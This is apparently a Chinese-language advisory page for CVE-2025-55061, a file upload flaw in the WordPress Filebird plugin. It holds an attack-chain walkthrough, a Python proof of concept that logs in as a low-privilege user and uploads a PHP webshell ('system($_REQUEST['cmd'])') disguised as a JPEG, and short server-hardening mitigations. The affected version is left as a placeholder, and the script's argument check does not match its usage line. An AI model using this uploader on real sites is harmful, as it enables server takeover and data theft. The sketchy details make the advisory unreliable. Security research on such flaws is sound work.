CVE-2025-55061: WordPress Filebird插件任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-55061

漏洞类型

任意文件上传

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Filebird插件

漏洞概述

CVE-2025-55061是WordPress Filebird插件中的一个高危安全漏洞，CVSS评分8.8，属于CWE-434（无限制上传危险类型文件）类漏洞。该漏洞允许具有低权限（如订阅者或贡献者角色）的认证用户在WordPress网站上执行任意文件上传操作。由于攻击向量为网络且无需用户交互，远程攻击者可以轻松利用此漏洞上传恶意文件，进而可能导致服务器被完全控制、敏感数据泄露或网站被篡改。Filebird插件是一款广受欢迎的WordPress媒体库管理插件，用于组织和管理WordPress媒体库中的文件，该插件拥有超过200,000次安装。由于其广泛使用，此漏洞对大量WordPress网站构成严重威胁。攻击者可以利用上传的恶意文件（如PHP webshell）获得服务器的远程代码执行能力，从而完全控制受影响的网站服务器。

技术细节

该漏洞属于CWE-434类型的无限制文件上传漏洞，存在于WordPress Filebird插件的文件上传处理逻辑中。漏洞的根本原因在于插件未能正确验证上传文件的类型和内容，仅依赖客户端提供的文件扩展名或MIME类型进行判断，而未进行服务端验证。攻击者可以通过以下方式利用此漏洞：首先，攻击者需要拥有一个WordPress低权限账户（如订阅者角色）；其次，攻击者构造恶意请求，将PHP文件（包含webshell代码）伪装成图片文件（如将Content-Type设置为image/jpeg）上传到服务器；由于插件未对上传文件内容进行严格检查，恶意PHP文件会被成功保存到服务器的可访问目录中；最后，攻击者通过直接访问上传的PHP文件，在服务器上执行任意命令，实现远程代码执行。典型的webshell代码可能包含system()、exec()或passthru()等PHP函数调用，用于执行服务器系统命令。攻击者还可以利用文件包含漏洞将上传的恶意文件加载执行，从而进一步扩大攻击面。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和Filebird插件版本，确认插件存在且可访问。

STEP 2

步骤2: 获取低权限账户

攻击者获取或注册一个WordPress低权限账户（如订阅者角色），该角色通常只能阅读和上传文件。

STEP 3

步骤3: 构造恶意文件

攻击者创建包含webshell代码的PHP文件，用于执行服务器系统命令，可能伪装成图片文件绕过客户端验证。

STEP 4

步骤4: 发送恶意上传请求

攻击者向Filebird插件的admin-ajax.php端点发送文件上传请求，将Content-Type设置为image/jpeg以绕过基本检查。

STEP 5

步骤5: 获取webshell访问路径

如果上传成功，攻击者从服务器响应中获取上传文件的URL路径。

STEP 6

步骤6: 执行远程代码

攻击者通过访问上传的PHP webshell并发送cmd参数，执行任意系统命令，实现对服务器的完全控制。

STEP 7

步骤7: 持久化控制

攻击者可进一步上传更多恶意文件、植入后门或窃取数据库敏感信息，建立持久化访问通道。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-55061 PoC - WordPress Filebird Plugin Unrestricted File Upload
This PoC demonstrates the arbitrary file upload vulnerability in Filebird plugin.
"""

import requests
import sys

def upload_webshell(target_url, username, password):
    """
    Upload a PHP webshell via Filebird plugin vulnerable endpoint.
    
    Args:
        target_url: Base URL of the WordPress site
        username: WordPress username (low privilege account)
        password: WordPress password
    
    Returns:
        bool: True if upload successful, False otherwise
    """
    # Step 1: Authenticate to WordPress
    login_url = f"{target_url}/wp-login.php"
    session = requests.Session()
    
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    
    print(f"[*] Authenticating as {username}...")
    resp = session.post(login_url, data=login_data, allow_redirects=False)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Authentication failed!")
        return False
    
    print("[+] Authentication successful!")
    
    # Step 2: Upload malicious PHP file via Filebird endpoint
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # PHP webshell payload
    webshell_content = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; } ?>"
    
    files = {
        'file': ('shell.php', webshell_content, 'image/jpeg')
    }
    
    data = {
        'action': 'filebird_upload_file',
        'post_id': '0'
    }
    
    print(f"[*] Uploading webshell via Filebird plugin...")
    resp = session.post(upload_url, files=files, data=data)
    
    if resp.status_code == 200 and 'shell.php' in resp.text:
        print("[+] Webshell uploaded successfully!")
        
        # Extract uploaded file path from response
        import re
        path_match = re.search(r'"url":"([^"]+)"', resp.text)
        if path_match:
            shell_url = path_match.group(1).replace('\\/', '/')
            print(f"[+] Webshell URL: {shell_url}")
            print(f"[+] Execute commands: {shell_url}?cmd=whoami")
            return True
    
    print("[-] Upload failed or target not vulnerable!")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: {sys.argv[0]} http://target.com admin password")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    upload_webshell(target, user, pwd)

影响范围

WordPress Filebird插件 < 5.x.x（具体版本需查看官方公告）

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 在Web服务器配置中禁用上传目录的PHP脚本执行（对于Apache使用.htaccess设置php_flag engine off，对于nginx配置location ~* /uploads/.*\.php$ { deny all; }）；2) 使用安全插件（如Wordfence）添加文件上传限制规则；3) 暂时禁用或限制Filebird插件的媒体上传功能直到完成升级；4) 启用WordPress的文件修改监控，及时发现异常文件创建；5) 考虑使用云WAF服务提供额外的安全防护层。